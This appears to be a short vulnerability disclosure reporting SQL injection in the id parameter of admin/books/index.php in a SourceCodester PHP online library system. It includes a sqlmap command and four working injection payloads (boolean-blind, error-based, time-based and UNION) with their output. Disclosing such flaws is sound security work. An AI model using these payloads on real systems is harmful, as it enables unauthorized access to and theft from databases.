BUG_AUTHOR:LIU WEIYU

Online Library System - SQL Injection on (admin/books/index.php id parameter) 

Vendor Homepage:
https://www.sourcecodester.com/php/14816/online-library-system-phpmysqli-full-source-code.html

Version:V1.0

Tested on: PHP, Apache, MySQL

Affected Page:
admin/books/index.php
On this page,id parameter is vulnerable to SQL Injection Attack 

Proof of vulnerability(Verify using the sqlmap tool):

-> sqlmap -u http://localhost/OLS/admin/books/index.php?view=edit&id=1345673 --batch

Output:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: view=edit&id=(SELECT (CASE WHEN (8142=8142) THEN 1345673 ELSE (SELECT 6769 UNION SELECT 4094) END))

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: view=edit&id=1345673 OR (SELECT 7000 FROM(SELECT COUNT(*),CONCAT(0x7176786a71,(SELECT (ELT(7000=7000,1))),0x717a767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: view=edit&id=1345673 AND (SELECT 7189 FROM (SELECT(SLEEP(5)))urAW)

    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: view=edit&id=1345673 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176786a71,0x5a794d795a7174496e4a724e5947487a55646e4f514e4b6275577148476a766c6a6f72505a4a5146,0x717a767a71)-- -
---
[14:24:07] [INFO] the back-end DBMS is MySQL

